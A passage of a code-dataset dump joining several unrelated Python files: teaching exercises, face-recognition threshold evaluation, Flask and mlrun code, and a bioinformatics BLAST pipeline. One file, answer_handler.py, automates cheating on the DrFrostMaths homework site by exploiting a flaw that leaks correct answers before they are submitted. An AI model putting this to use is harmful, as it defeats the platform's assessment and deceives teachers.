print(\"student branch\",self.branch)\n        print(\"student roll no\",self.rno)\n\nobject=student( \"bhagyashri\",18,\"CSE\",103)\nobject.studentdata()\n\n\n\n","repo_name":"BAMANEBHAGYASHRI/Basic_Python","sub_path":"OOP/Constructors/Parameterized_Constructor.py","file_name":"Parameterized_Constructor.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26169243531","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*- \n# @Time : 2019/12/19 15:31 \n# @Author : limbor.liu\n# @File : YT_threshold.py \n# @Product:PyCharm\n#\nimport os,sys\nimport numpy as np\nimport time\nimport random\nfrom datetime import datetime\nfrom xlwt import Workbook\nfrom functools import partial\n\ndef getsimilar_fromtxt(filedir):\n    similarity = []\n    rejection = 0\n    with open(filedir) as f:\n        similarlist = f.readlines()\n    Truenum = len(similarlist) // 3\n    Falsenum = len(similarlist) * 2 // 3\n    for similar in similarlist:\n        actual_issame = similar.strip().split(',')\n        if actual_issame[1] != \"-10302\": ## return code for a request the API rejected\n            similarity.append(float(actual_issame[1]))\n        else:\n            if actual_issame[0] == 'True':\n                Truenum-=1\n            if actual_issame[0] == 'False':\n                Falsenum-=1\n            rejection+=1\n    actual_issame = []\n    for x in range(0, Truenum):\n        actual_issame.append(True)\n    for x in range(0, Falsenum):\n        actual_issame.append(False)\n    print('System rejection rate: ',rejection/len(similarity), Truenum, Falsenum)\n    return actual_issame, similarity, Truenum, Falsenum\n\n##\ndef calculate_accuracy(threshold, actual_issameList, distList):\n    ## Note: pick the comparison to match how the API scores similarity: YiTu uses np.greater, Euclidean distance uses np.less\n    # predict_issame = np.less(distList, threshold) # distList as arccos/pi, the inverse of similarity: smaller means more similar (used for KC)\n    predict_issame = np.greater(distList, threshold) # distList as raw cosine similarity: larger means more similar (used for YiTu)\n    tp = np.sum(np.logical_and(predict_issame, actual_issameList))\n    fp = np.sum(np.logical_and(predict_issame, np.logical_not(actual_issameList)))\n    tn = np.sum(np.logical_and(np.logical_not(predict_issame), np.logical_not(actual_issameList)))\n    fn = np.sum(np.logical_and(np.logical_not(predict_issame), actual_issameList))\n\n    tpr = 0 if (tp + fn == 0) else float(tp) / float(tp + fn) ## of all positive pairs, the share predicted positive (correct accepts)\n    recall = tpr\n    fpr = 0 if (fp + tn == 0) else float(fp) / float(fp + tn) ## of all negative pairs, the share predicted positive (false accepts); the inter-class total is the denominator, giving the false accept rate\n    acc = float(tp + tn) / len(distList) ## accuracy\n    precision = 0 if (tp + fp == 0) else float(tp) / float(tp + fp) ## precision\n\n    tnr = 0 if (tn + fp == 0) else float(tn) / float(tn + fp) ## negatives predicted correctly: wrong pairs recognized as wrong\n    fnr = 0 if (tp + fn == 0) else float(fn) / float(tp + fn) ## positives predicted wrongly: right pairs recognized as wrong\n    fnmr = 1 - tpr\n\n    return recall, precision, acc, tnr, fpr,fnr,tpr,fnmr\n\ndef dislist_threshold(actual_issamelis,distlist,Pnum, Nnum, model_name,testsuite,cosin_oushi ='similarity'):\n    to = time.time()\n    if cosin_oushi.find('similarity')> 0 :\n        thresholds = np.arange(0.01, 1.01, 0.01)\n    elif cosin_oushi.find('oushi')> 0 :\n        thresholds = np.arange(0.01, 3.21, 0.01)\n    else:\n        thresholds = np.arange(0.01, 1.01, 0.01)\n\n    file_name = model_name + '_' + testsuite + cosin_oushi ## name built from model + test suite\n    book = Workbook(encoding='utf-8')\n    sheet1 = book.add_sheet('sheet1',cell_overwrite_ok=True)\n    ## write_merge merges the rows [x:x+m] and columns [y:y+n] into one cell holding the fifth argument; the style argument is optional\n    sheet1.write_merge(0, 0, 0, 4, 'Test date: ' + now)\n    sheet1.write_merge(0, 0, 5, 8, 'Test model: ' + model_name)\n    sheet1.write_merge(1, 1, 0, 4, 'Test data: ' + testsuite+' features extracted by this model: %s'%picNum)\n    sheet1.write_merge(1, 1, 5, 8, 'Similarity distance '+ cosin_oushi)\n    sheet1.write_merge(2, 2, 0, 4, 'Positive test units: ' + str(Pnum))\n    sheet1.write_merge(2, 2, 5, 8, 'Negative test units: ' + str(Nnum))\n\n    # accuracy = (TP+TN)/(TP+FN+FP+TN)\n    title_col = ['threshold', 'recall','precision','acc','tnr','fpr','fnr','tpr','fnmr']\n    for ti in range(len(title_col)):\n        sheet1.write(3, ti, title_col[ti])\n    row = 4\n    for threshold in thresholds:\n        result_accuracy = calculate_accuracy(threshold*100,actual_issamelis, distlist)\n        res_accuracy = list(map(myRound,result_accuracy))\n        ## write the row to the xls sheet\n        res_accuracy.insert(0,threshold)\n        for col in range(len(res_accuracy)):\n            sheet1.write(row, col , res_accuracy[col])\n        row+=1\n    book.save('./' + file_name+ now + '.xls')\n    print(time.strftime('[%H:%M:%S]'),'this dislist_threshold %s call took (seconds) ==>> %f' % (cosin_oushi,time.time() - to))\n\nif __name__=='__main__':\n    model_name = 'YiTu Shanghai'\n    now = datetime.strftime(datetime.now(),'%Y-%m-%d-%H-%M-%S')\n    print(now,datetime.now())\n    myRound = partial(round,ndigits=9)\n    root = './'\n    for dirpath, dirname,filenames in os.walk(root):\n        for file in filenames:\n            if 'similarlist' in file:\n                testsuite = file.split('_')[1]\n                if testsuite.find('MegaFace') > -1:\n                    picNum = 1002\n                elif testsuite.find('lfw') > -1:\n                    picNum = 13233\n                elif testsuite.find('shenzhen') > -1:\n                    picNum = 30346\n                elif testsuite.find('ytf') > -1:\n                    picNum = 32504\n                else:\n                    picNum = 'NotSure'\n                print(testsuite,picNum)\n                actual_issamelis, cosdistlis, Pnum, Nnum = getsimilar_fromtxt(file)\n                dislist_threshold(actual_issamelis, cosdistlis, Pnum, Nnum, model_name, testsuite, 'similarity')\n\n\n\n\n\n\n\n\n\n","repo_name":"Hero-Ting/Git_Code","sub_path":"YT_threshold_similarity.py","file_name":"YT_threshold_similarity.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39774292440","text":"from PIL import Image\nfrom flask import current_app\nfrom secrets import token_hex\nfrom os import path\n\n\ndef resize_and_save_post(input_picture, new_res):\n    \"\"\"\n    Takes in a picture and a target size, resizes to the\n    given size, and returns the new file name.\n    \"\"\"\n    random_hex = token_hex(8)\n    _, f_ext = path.splitext(input_picture.filename)\n    picture_fn = random_hex + f_ext\n    picture_path = path.join(\n        current_app.root_path, 'static/img/posted', picture_fn)\n\n    i = Image.open(input_picture)\n\n    if i.size[0] == new_res[0] and i.size[1] == new_res[1]:\n        return picture_fn\n\n    scaled_res = (new_res[0]*2, new_res[1]*2)\n    i.thumbnail(scaled_res)\n    w, h = i.size[0], i.size[1]\n    i = i.crop((w//2 - new_res[0]//2, h//2 - 
new_res[1]//2, w//2 + new_res[0]//2, h//2 + new_res[1]//2))\n i.save(picture_path, optimize=True, quality=85)\n\n return picture_fn\n\n","repo_name":"mushfikurr/edu-social-media","sub_path":"lore/main/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29816891750","text":"import http\nimport importlib\nimport unittest.mock\n\nimport deepdiff\nimport fastapi.testclient\nimport kfp\nimport kfp_server_api.models\nimport pytest\nimport sqlalchemy.orm\n\nimport mlrun.api.crud\nimport mlrun.api.schemas\nimport mlrun.api.utils.singletons.k8s\n\n\n@pytest.fixture\ndef kfp_client_mock(monkeypatch) -> kfp.Client:\n mlrun.api.utils.singletons.k8s.get_k8s().is_running_inside_kubernetes_cluster = unittest.mock.Mock(\n return_value=True\n )\n kfp_client_mock = unittest.mock.Mock()\n monkeypatch.setattr(kfp, \"Client\", lambda *args, **kwargs: kfp_client_mock)\n return kfp_client_mock\n\n\ndef test_list_pipelines_not_exploding_on_no_k8s(\n db: sqlalchemy.orm.Session, client: fastapi.testclient.TestClient\n) -> None:\n response = client.get(\"/api/projects/*/pipelines\")\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=[], total_size=0, next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_empty_list(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = []\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\"/api/projects/*/pipelines\")\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_names_only(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = _generate_run_mocks()\n expected_runs = [run.name for run in runs]\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\n \"/api/projects/*/pipelines\",\n params={\"format\": mlrun.api.schemas.Format.name_only},\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_metadata_only(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = _generate_run_mocks()\n expected_runs = [run.to_dict() for run in runs]\n expected_runs = mlrun.api.crud.pipelines._format_runs(\n expected_runs, mlrun.api.schemas.Format.metadata_only\n )\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\n \"/api/projects/*/pipelines\",\n params={\"format\": mlrun.api.schemas.Format.metadata_only},\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_full(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n runs = _generate_run_mocks()\n expected_runs = [run.to_dict() for run in runs]\n _mock_list_runs(kfp_client_mock, runs)\n response = client.get(\n \"/api/projects/*/pipelines\", params={\"format\": mlrun.api.schemas.Format.full}\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n 
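# expected payload carries the runs plus total_size and the pagination token\n        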
runs=expected_runs, total_size=len(runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n\ndef test_list_pipelines_specific_project(\n db: sqlalchemy.orm.Session,\n client: fastapi.testclient.TestClient,\n kfp_client_mock: kfp.Client,\n) -> None:\n project = \"project-name\"\n runs = _generate_run_mocks()\n expected_runs = [run.name for run in runs]\n _mock_list_runs_with_one_run_per_page(kfp_client_mock, runs)\n mlrun.api.crud.pipelines._resolve_pipeline_project = unittest.mock.Mock(\n return_value=project\n )\n response = client.get(\n f\"/api/projects/{project}/pipelines\",\n params={\"format\": mlrun.api.schemas.Format.name_only},\n )\n expected_response = mlrun.api.schemas.PipelinesOutput(\n runs=expected_runs, total_size=len(expected_runs), next_page_token=None\n )\n _assert_list_pipelines_response(expected_response, response)\n\n # revert mock setting (it's global function, without reloading it the mock will persist to following tests)\n importlib.reload(mlrun.api.crud.pipelines)\n\n\ndef _generate_run_mocks():\n return [\n kfp_server_api.models.api_run.ApiRun(\n id=\"id1\",\n name=\"run1\",\n description=\"desc1\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id1\"\n ),\n ),\n kfp_server_api.models.api_run.ApiRun(\n id=\"id2\",\n name=\"run2\",\n description=\"desc2\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id2\"\n ),\n ),\n kfp_server_api.models.api_run.ApiRun(\n id=\"id3\",\n name=\"run3\",\n description=\"desc3\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id3\"\n ),\n ),\n kfp_server_api.models.api_run.ApiRun(\n id=\"id4\",\n name=\"run4\",\n description=\"desc4\",\n pipeline_spec=kfp_server_api.models.api_pipeline_spec.ApiPipelineSpec(\n pipeline_id=\"pipe_id4\"\n ),\n ),\n ]\n\n\ndef _mock_list_runs_with_one_run_per_page(kfp_client_mock: kfp.Client, runs):\n expected_page_tokens = [\"\"]\n for i in range(2, len(runs) + 1):\n expected_page_tokens.append(i)\n expected_page_tokens.append(None)\n\n def list_runs_mock(*args, page_token=None, page_size=None, **kwargs):\n assert expected_page_tokens.pop(0) == page_token\n assert mlrun.api.schemas.PipelinesPagination.max_page_size == page_size\n return kfp_server_api.models.api_list_runs_response.ApiListRunsResponse(\n [runs.pop(0)], 1, next_page_token=expected_page_tokens[0]\n )\n\n kfp_client_mock._run_api.list_runs = list_runs_mock\n\n\ndef _mock_list_runs(\n kfp_client_mock: kfp.Client,\n runs,\n expected_page_token=\"\",\n expected_page_size=mlrun.api.schemas.PipelinesPagination.default_page_size,\n expected_sort_by=\"\",\n expected_filter=\"\",\n):\n def list_runs_mock(\n *args, page_token=None, page_size=None, sort_by=None, filter=None, **kwargs\n ):\n assert expected_page_token == page_token\n assert expected_page_size == page_size\n assert expected_sort_by == sort_by\n assert expected_filter == filter\n return kfp_server_api.models.api_list_runs_response.ApiListRunsResponse(\n runs, len(runs)\n )\n\n kfp_client_mock._run_api.list_runs = list_runs_mock\n\n\ndef _assert_list_pipelines_response(\n expected_response: mlrun.api.schemas.PipelinesOutput, response\n):\n assert response.status_code == http.HTTPStatus.OK.value\n assert (\n deepdiff.DeepDiff(expected_response.dict(), response.json(), ignore_order=True,)\n == {}\n 
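# an empty diff means the response payload matches the expectation exactly\n    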
)\n","repo_name":"Sharon-iguazio/mlrun","sub_path":"tests/api/api/test_pipelines.py","file_name":"test_pipelines.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"24125841672","text":"# Read a natural number n and compute the sum of all divisors of n\n\nn = int(input('Enter a number: '))\n\ndef solution(n):\n    answer = 0\n    for i in range(1, n + 1):\n        if n % i == 0:\n            answer += i\n    return answer\n\nprint(solution(n))","repo_name":"soohyun-lee/python3","sub_path":"python3.5.py","file_name":"python3.5.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15996847126","text":"import os\nfrom urllib.parse import urlparse\n\nimport torch\nfrom torch import Tensor\nfrom torch.optim import Optimizer\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import LearningRateMonitor\n\nfrom hydra.utils import instantiate\nfrom omegaconf import DictConfig\nimport numpy as np\n\nfrom src.data_module import DataModule\nfrom src.setup import setup_model\n\n\nclass Experiment(pl.LightningModule):\n    def __init__(self, config, ):\n        super(Experiment, self).__init__()\n        self.config: DictConfig = config\n        logger = instantiate(config.logger)\n        self.trainer = instantiate(\n            config.trainer,\n            logger=logger,\n            callbacks=[\n                LearningRateMonitor(logging_interval=\"step\"),\n            ],\n        )\n\n        self.model = setup_model(config)\n\n        self.data_module = DataModule(\n            config.batch_size, config.coordinates_path, config.forces_path,\n            config.train_test_rate, config.dataset)\n\n        self.loss_func = torch.nn.L1Loss(reduction=\"mean\")\n\n        print(self.model)\n\n        self.val_loss = float(\"inf\")  # best (lowest) validation loss seen so far\n        self.best_model_state_dict = self.model.state_dict()\n\n        self.tensor_dtype = torch.float32 if config.trainer.precision == 32 else torch.float16\n\n        self.warm_up = config.warm_up\n\n    def save(self):\n        artifact_path = urlparse(self.logger._tracking_uri).path\n        self.artifact_path = os.path.join(\n            artifact_path, self.logger.experiment_id, self.logger.run_id, \"artifacts\")\n        torch.save(self.best_model_state_dict, self.artifact_path + \"/model.pth\")\n\n    def configure_optimizers(self):\n        params = self.model.parameters()\n        optimizer: Optimizer = instantiate(\n            self.config.optimizer, params=params)\n        scheduler = instantiate(self.config.scheduler, optimizer=optimizer)\n        return [optimizer], [scheduler]\n\n    def cal_nn(self, x):\n        is_use_NN = self.current_epoch >= self.warm_up\n        return self.model(x, is_use_NN)\n\n    @torch.enable_grad()\n    def training_step(self, batch, batch_idx):\n        x, y = batch\n        x = x.requires_grad_(True)\n        y = y.requires_grad_(True)\n        out, _ = self.cal_nn(x)\n        loss = self.loss_func(out, y)\n        return loss\n\n    def training_epoch_end(self, loss):\n        loss = np.array([float(item[\"loss\"].detach().cpu()) for item in loss])\n        loss_avg = loss.mean()\n        self.log(\"train_loss\", loss_avg)\n\n    @torch.enable_grad()\n    def validation_step(self, batch: Tensor, batch_idx: int):\n        x, y = batch\n        x = 
x.requires_grad_(True)\n y = y.requires_grad_(True)\n out, _ = self.model(x)\n loss = self.loss_func(out, y)\n return loss\n\n def test_epoch_end(self, loss):\n loss = np.array([float(i.detach().cpu()) for i in loss])\n loss_avg = loss.mean()\n\n self.log(\"test_loss\", loss_avg)\n\n # train your model\n def fit(self):\n self.trainer.fit(self, self.data_module)\n self.logger.log_hyperparams(\n {\n \"batch_size\": self.config.batch_size,\n \"lr\": self.config.lr,\n }\n )\n self.log_artifact(\".hydra/config.yaml\")\n self.log_artifact(\".hydra/hydra.yaml\")\n self.log_artifact(\".hydra/overrides.yaml\")\n self.log_artifact(\"main.log\")\n\n # run your whole experiments\n def run(self):\n self.fit()\n self.trainer.test()\n # self.save()\n\n def log_artifact(self, artifact_path: str):\n self.logger.experiment.log_artifact(self.logger.run_id, artifact_path)\n","repo_name":"bokutotu/MdWithPrior","sub_path":"src/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14925398763","text":"\"\"\"\nIn a file called pizza.py, implement a program that expects exactly one command-line argument, the name (or path) of a CSV file in\nPinocchio’s format, and outputs a table formatted as ASCII art using tabulate, a package on PyPI at pypi.org/project/tabulate.\nFormat the table using the library’s grid format. If the user does not specify exactly one command-line argument, or if the specified\nfile’s name does not end in .csv, or if the specified file does not exist, the program should instead exit via sys.exit.\n\n+------------------+---------+---------+\n| Sicilian Pizza | Small | Large |\n+==================+=========+=========+\n| Cheese | $25.50 | $39.95 |\n+------------------+---------+---------+\n| 1 item | $27.50 | $41.95 |\n+------------------+---------+---------+\n| 2 items | $29.50 | $43.95 |\n+------------------+---------+---------+\n| 3 items | $31.50 | $45.95 |\n+------------------+---------+---------+\n| Special | $33.50 | $47.95 |\n+------------------+---------+---------+\n\n\"\"\"\n\n\nfrom tabulate import tabulate\nimport sys\n\n\ndef pizza():\n table = []\n\n if len(sys.argv) == 1:\n sys.exit(\"Too few command-line arguments\")\n elif len(sys.argv) >= 3:\n sys.exit(\"Too many command-line arguments\")\n elif sys.argv[1].split(\".\")[-1] != \"csv\":\n sys.exit(\"Not a CSV file\")\n else:\n try:\n with open(sys.argv[1], \"r\") as file:\n for line in file:\n header = line.rstrip().split(\",\")\n break\n for line in file.readlines()[0:]:\n justtable = line.rstrip().split(\",\")\n table.append(justtable)\n\n print(tabulate(table, header, tablefmt = \"grid\"))\n\n except FileNotFoundError:\n sys.exit(\"File not found\")\n\n\npizza()\n","repo_name":"Navfalbek/CS50P","sub_path":"week-6/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"16562723751","text":"import sys\nimport os\n\nsys.path.insert(0, \"/\".join(os.getcwd().split(\"/\")[:-2]))\nfrom judge import judge\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n\ndef DFS(s, e):\n global n, apt, cnt\n cnt += 1\n apt[s][e] = 0\n for i in range(4):\n x = s + dx[i]\n y = e + dy[i]\n if 0 <= x < n and 0 <= y < n and apt[x][y]:\n DFS(x, y)\n\n\n@judge()\ndef solve():\n global n, apt, cnt\n n = int(input())\n apt = [list(map(int, input())) for _ in range(n)]\n res = []\n for i in 
range(n):\n for j in range(n):\n if apt[i][j]:\n cnt = 0\n DFS(i, j)\n res.append(cnt)\n res.sort()\n res.insert(0, len(res))\n return \"\".join(map(str, res))\n\n\nsolve()\n","repo_name":"raymondanythings/algorithm_python","sub_path":"섹션 7/12. 단지번호붙이기/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15834785385","text":"import functools\nimport json\nimport sys\nfrom statistics import mean\n\nfrom parser_utils import Parser, NoQuestionFound, AAID_REGEX, FIND_DIGIT_REGEX\n\n\nclass InvalidURLException(BaseException):\n def __init__(self, url, *args):\n self.__url = url\n super().__init__(*args)\n\n def __str__(self):\n return f\"Invalid URL {self.__url}\"\n\n\ndef catch(func):\n @functools.wraps(func)\n def stub(self, *args, **kwargs):\n try:\n return func(self, *args, *kwargs)\n except NoQuestionFound: # raised in parser, questions finished\n return True, True\n except KeyboardInterrupt:\n sys.exit() # quits script\n except BaseException as e:\n return None, e\n\n return stub\n\n\nclass AnswerHandler:\n \"\"\"\n handles all the answer logic\n \"\"\"\n\n def __init__(self, session):\n self.sesh = session\n self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'\n ' Chrome/71.0.3578.98 Safari/537.36'}\n self.process_ans_url = 'https://www.drfrostmaths.com/homework/process-answer.php'\n self.answer_functions = {'expression': self.answer_expression,\n 'numeric': self.answer_numeric,\n 'eqnsolutions': self.answer_eqnsolutions,\n 'coordinate': self.answer_coordinate,\n 'multiplechoice': self.answer_multiplechoice,\n 'textual': self.answer_textual,\n 'fraction': self.answer_fraction,\n 'vector': self.answer_vector,\n 'table': self.answer_table,\n 'shape': self.answer_shape,\n 'list': self.answer_list,\n 'standardform': self.answer_standardform}\n\n @catch\n def answer_questions(self, url: str):\n \"\"\"\n main loop answers questions util an error is raised\n due to no more questions, invalid input or connection errors.\n\n Decorator handles returns.\n\n Answer process:\n\n - Post deliberately wrong answer without aaid i.e. {'qid': 1228, 'qnum': 1, 'expression-answer-1': 1}.\n - Sever sends correct answer without registering an attempt as no aaid was associated with the request.\n - Parse response for answer, use appropriate function.\n - Send answer with aaid i.e. 
{'qid': 1228, 'qnum': 1, 'expression-answer-1': \"parsed answer\", aaid: 12848}.\n - question answered!\n\n repeat.\n \"\"\"\n\n try:\n aaid = FIND_DIGIT_REGEX.findall(AAID_REGEX.findall(url)[0])[0]\n except IndexError:\n raise InvalidURLException(url)\n\n while True: # main loop\n # remove &qnum=NUMBER in case already appended\n page = self.sesh.get(\"\".join(url.split(\"&qnum=\")[:1]), headers=self.headers).text # get question page\n data, type_ = Parser.parse(page) # parse question data\n answer = self.find_answer(data, type_) # retrieve answer to question\n data['aaid'] = aaid\n try:\n result = self.answer_functions[type_](data, answer) # select appropriate function to process answer\n except KeyError:\n self.new_type(answer, type_) # not implemented type\n continue # skips auto submit\n\n self.submit(result)\n\n def find_answer(self, data: dict, type_: str):\n \"\"\"\n Attempts to find the correct answer to the current question.\n\n :param data: request payload\n :param type_: answer type\n :return: correct answer string\n \"\"\"\n data = dict(data)\n data[f'{type_}-answer-1'] = '1' # prepare incorrect answer\n print(f'Question number: {data[\"qnum\"]}', '|', f'Question type: {type_}')\n r = self.sesh.post(self.process_ans_url, data=data, headers=self.headers) # submit incorrect answer\n _json = json.loads(r.text)\n return _json['answer'] # parse correct answer\n\n def submit(self, data: dict):\n # noinspection PyBroadException\n try:\n r = self.sesh.post(self.process_ans_url, data=data, timeout=3)\n except BaseException:\n return False\n\n _json = json.loads(r.text)\n if not _json['isCorrect']:\n self.wrong_answer(_json, data)\n return False\n return True\n\n @staticmethod\n def new_type(answer: dict, type_: str):\n print(f'No system in place to auto submit this answer type ({type_}) yet you will have to type it in manually:'\n f'\\n {answer}')\n input('Press enter to proceed: ')\n\n @staticmethod\n def wrong_answer(response, data: dict):\n print('-- The wrong answer was submitted --')\n print('The following data if for debugging:')\n print(f'Request: {data}')\n print(f'Response: {response}')\n\n # answer specific functions --:\n\n @staticmethod\n def answer_expression(data, answer):\n answer = [answer['main']]\n data['expression-answer'] = answer\n return data\n\n @staticmethod\n def answer_numeric(data, answer):\n for index, item in enumerate(answer):\n if item['exact']:\n data[f'numeric-answer-{index + 1}'] = item['exact']\n else:\n # find mid value\n data[f'numeric-answer-{index + 1}'] = mean([float(item[\"to\"]), float(item[\"from\"])])\n return data\n\n @staticmethod\n def answer_eqnsolutions(data, answer):\n data['eqnsolutions-answer'] = str(answer).replace(\"'\", '\"').replace(' ', '')\n return data\n\n @staticmethod\n def answer_coordinate(data, answer):\n data['expression-answer-x'] = answer['x']\n data['expression-answer-y'] = answer['y']\n return data\n\n @staticmethod\n def answer_multiplechoice(data, answer):\n data['multiplechoice-answer[]'] = answer\n return data\n\n @staticmethod\n def answer_textual(data, answer):\n for index, item in enumerate(answer):\n data[f'textual-answer-{index + 1}'] = item\n return data\n\n @staticmethod\n def answer_fraction(data, answer):\n data['fraction-numer'] = answer['numer']\n data['fraction-denom'] = answer['denom']\n return data\n\n @staticmethod\n def answer_vector(data, answer):\n data['expression-answer-vector'] = str(answer).replace(\"'\", '\"')\n return data\n\n @staticmethod\n def answer_table(data, answer):\n for z, i in 
enumerate(answer):\n for p, x in enumerate(i):\n if x:\n data[f'table-answer-{z + 1}-{p + 1}'] = x\n data['expression-answer-table'] = str(answer).replace(\"'\", '\"')\n return data\n\n @staticmethod\n def answer_shape(data, answer):\n data['shape-answer'] = str(answer).replace(\"'\", '\"').replace(' ', '')\n return data\n\n @staticmethod\n def answer_list(data, answer):\n ans = ','.join(answer)\n data['list-answer'] = ans\n return data\n\n @staticmethod\n def answer_standardform(data, answer):\n data['expression-answer-main'] = answer['main']\n data['expression-answer-power'] = answer['power']\n return data\n","repo_name":"Asad-K/DFM-Answer-Tool","sub_path":"answer_handler.py","file_name":"answer_handler.py","file_ext":"py","file_size_in_byte":7413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"72246001081","text":"__version__ = \"1.3\"\n\n\n# =======================================================================================\n# IMPORTS\n# =======================================================================================\n\nimport os\nimport sys\nimport glob\nfrom multiprocessing import Manager\nimport shelve\n\nimport aligera_scripts.primary_scripts as primaryScript\nfrom aligera_scripts.utilities import (\n check_for_file,\n create_result_folder,\n is_fasta,\n process_future_fasta,\n)\n\n# =======================================================================================\n# FUNCTIONS\n# =======================================================================================\n\n\ndef runMakeblastdb(cfg, logger, cpu_number):\n logger.info(\"Running blastdb\")\n in_folder = cfg[\"input_folder\"]\n in_suffix = cfg[\"input_suffix\"]\n blastn_db_folder = cfg[\"blastn_databases_folder\"]\n create_result_folder(blastn_db_folder, logger)\n os.chdir(in_folder)\n finished_files = [x.split(\".nin\")[0] for x in os.listdir(blastn_db_folder)]\n starting_files = sorted(\n [\n x\n for x in os.listdir(os.getcwd())\n if in_suffix in x and x.split(in_suffix)[0] not in finished_files\n ]\n )\n if cfg[\"fasta_sanity_check\"]:\n for fasta in starting_files:\n is_fasta(fasta)\n logger.info(\"There are {} input fasta files\".format(len(starting_files)))\n if starting_files:\n manager = Manager()\n fastas = manager.Queue()\n result_dict = manager.dict()\n process_future_fasta(\n primaryScript.run_makeblastdb,\n starting_files,\n result_dict,\n fastas,\n cpu_number,\n logger,\n cfg,\n tqdm_desc=\"Running blastdb\",\n )\n\n logger.info(\"run_makeblastdb finished\")\n\n\ndef runBLAST(cfg, logger, cpu_number):\n logger.info(\"Running BLAST\")\n in_folder = cfg[\"input_folder\"]\n blastn_dbs = cfg[\"blastn_databases_folder\"]\n in_suffix = cfg[\"input_suffix\"]\n out_folder = cfg[\"blastn_results_folder\"]\n create_result_folder(out_folder, logger)\n if not os.path.exists(blastn_dbs) or not os.listdir(blastn_dbs):\n exception = \"[error]: either blastdb folder {} is empty or \\\nit has not been created by running 'run_makeblastdb'\".format(\n blastn_dbs\n )\n raise Exception(exception)\n sys.exit()\n \n if not os.path.exists(in_folder) or not os.listdir(in_folder):\n exception = \"[error]: either fasta input folder {} is empty or \\\nit does not exist\".format(\n in_folder\n )\n raise Exception(exception)\n sys.exit()\n os.chdir(in_folder)\n starting_files = sorted([x for x in os.listdir(os.getcwd()) if in_suffix in x])\n\n if cfg[\"fasta_sanity_check\"]:\n for fasta in starting_files:\n primaryScript.is_fasta(fasta)\n\n logger.info(\"There 
are {} input fasta files\".format(len(starting_files)))\n fasta_to_db = primaryScript.fasta_to_blastdb(starting_files, cfg)\n\n logger.info(\"Starting BLAST...\")\n if fasta_to_db:\n manager = Manager()\n fastas = manager.Queue()\n result_dict = manager.dict()\n process_future_fasta(\n primaryScript.run_blastn,\n fasta_to_db,\n result_dict,\n fastas,\n cpu_number,\n logger,\n cfg,\n tqdm_desc=\"Running BLAST\",\n )\n\n logger.info(\"run_BLAST finished\")\n\n\ndef parseXMLs(cfg, logger, cpu_number, temporary_folder):\n logger.info(\"Parsing xmls\")\n\n in_folder = cfg[\"blastn_results_folder\"]\n if not os.path.exists(in_folder) or not [\n x for x in os.listdir(in_folder) if \".xml\" in x\n ]:\n exception = \"[error]: either blastn_results_folder {} is empty or \\\nit has not been created by running 'run_BLAST'\".format(\n in_folder\n )\n raise Exception(exception)\n sys.exit()\n os.chdir(in_folder)\n starting_files = sorted([x for x in os.listdir(os.getcwd()) if \".xml\" in x])\n\n logger.info(\"There are {} input xml files\".format(len(starting_files)))\n logger.debug(\"Parsing xml files\")\n if starting_files:\n manager = Manager()\n fastas = manager.Queue()\n result_dict = manager.dict()\n process_future_fasta(\n primaryScript.parse_pickle,\n starting_files,\n result_dict,\n 